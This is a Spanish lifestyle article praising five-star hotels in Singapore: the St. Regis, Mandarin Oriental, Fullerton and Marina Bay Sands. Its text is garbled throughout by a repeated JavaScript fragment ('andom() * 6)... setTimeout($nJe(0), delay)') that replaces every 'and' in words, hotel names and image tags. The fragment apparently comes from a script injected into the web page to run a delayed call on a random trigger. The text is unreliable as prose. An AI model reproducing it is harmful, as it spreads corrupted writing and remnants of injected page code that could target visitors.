Hoteles 5 estrellas en Singapur

    Hoteles 5 estrellas en Singapur

    Estancia de primera clase.

    Autor: Redacción Maxim 17 diciembre, 2019


    andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands-resort-1024×569.png» alt=»» width=»1024″ height=»569″ />
    FOTO: Cortesía

     

    Mientras que no todos pueden comprar su propio Good Class Bungalow o un penthouse, la ciudad ofrece una amplia selección de hoteles de clase mundial.

     

     

    Hotel St. Regis

    Hoteles cinco estrellas hay muchos, como el St. Regis Singapur, en donde hasta el más mínimo detalle es cuidado, desde la colección de arte privada hasta la suite presidencial, uno de los alojamientos más exclusivos de la ciudad con un baño en mármol Breche de Benou y una master suite que no le envidia nada a los salones del palacio de Versalles.

     

     

     

    Candom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andelabros de cristal, servicios personalizados y el mayordomo del St. Regis son tan solo algunas de las características que producen un nivel de opulencia que destaca, inclusive entre los demás integrantes de la colección St. Regis. Ubicado cerca del elegante distrito de compras Orchard Road, la propiedad ofrece lo mejor de la ciudad a tan solo unos pasos, suponiendo que puedan convencerte de explorar fuera de esta catedral del lujo.

     

     

    Hotel Mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andarin Oriental

    El Mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andarin Oriental en Singapur es otro competidor dentro de la lista de los hoteles más exclusivos de la ciudad gracias a sus servicios tradicionales, su refinado diseño, selecta gastronomía y opciones de spa. Ubicado en el distrito de Marina Bay, el hotel es ideal para turistas y empresarios. Si estás por ahí, asegúrate de visitar el Oriental Club Lounge, localizado en el piso 19 y donde podrás disfrutar de un apacible refugio mientras observas el maravilloso skyline de la ciudad al tiempo que degustas el desayuno con champaña, una forma ideal de comenzar el día.

     

     

     

    Hotel Fullerton

    El hotel Fullerton Singapur es, literalmente, un monumento nacional (en 2015 se le otorgó el título). Con más de 90 años de antigüedad, el edificio cuenta con uno de los diseños arquitectónicos más impresionantes de la ciudad y tiene un papel preponderante en la historia de la misma. Mientras que su opulencia puede ser más discreta en comparación con aquellos más nuevos, el Fullerton no sacrifica nada en cuanto a servicio o la experiencia de los huéspedes. Es más, se enorgullece de poseer la suite más exclusiva de todo Singapur: la suite presidencial. Esta es una afirmación difícil de negar considerandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que la suite cuenta con un elevador privado, un piano de cola pequeño y una terraza rodeada de cristal justo afuera de los elegantes salones de estar y para comer.

     

     

     

    Marina by Sandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Resort

    Inclusive si te quedas en cualquier otro de los hoteles cinco estrellas que hay en la ciudad, debería ser obligatorio que los visitantes experimentaran la Marina Bay Sandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands  y su mundialmente reconocida alberca infinita, ubicada en el piso 57 y con vista a la ciudad. El hotel es exquisito y el lugar de moda para las celebridades mundiales y para todos aquellos que imponen los gustos, sin embargo, la alberca infinita es la joya de la corona y cualquier visita a la ciudad estará incompleta si no pasas unas horas en ella con una copa en la mano.

     

    andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands-resort-1024×569.png» alt=»» width=»1024″ height=»569″ />

     

     

    andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands-resort.png» alt=»» width=»1013″ height=»646″ />

    Universe of Water Particles, Trascending Bounderies (2017), es parte de la exposición permanente del Museo de Arte y Ciencia del Marina Bay Sandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands.

     

    Si quieres una vista increíble de los jardines botánicos de Singapur lo puedes hacer desde este rascacielos, UNA DE LAS PROPIEDADES MÁS BUSCADAS EN SINGAPUR

     

    Temas relacionados con esta nota: , , , , ,

Estancia de primera clase.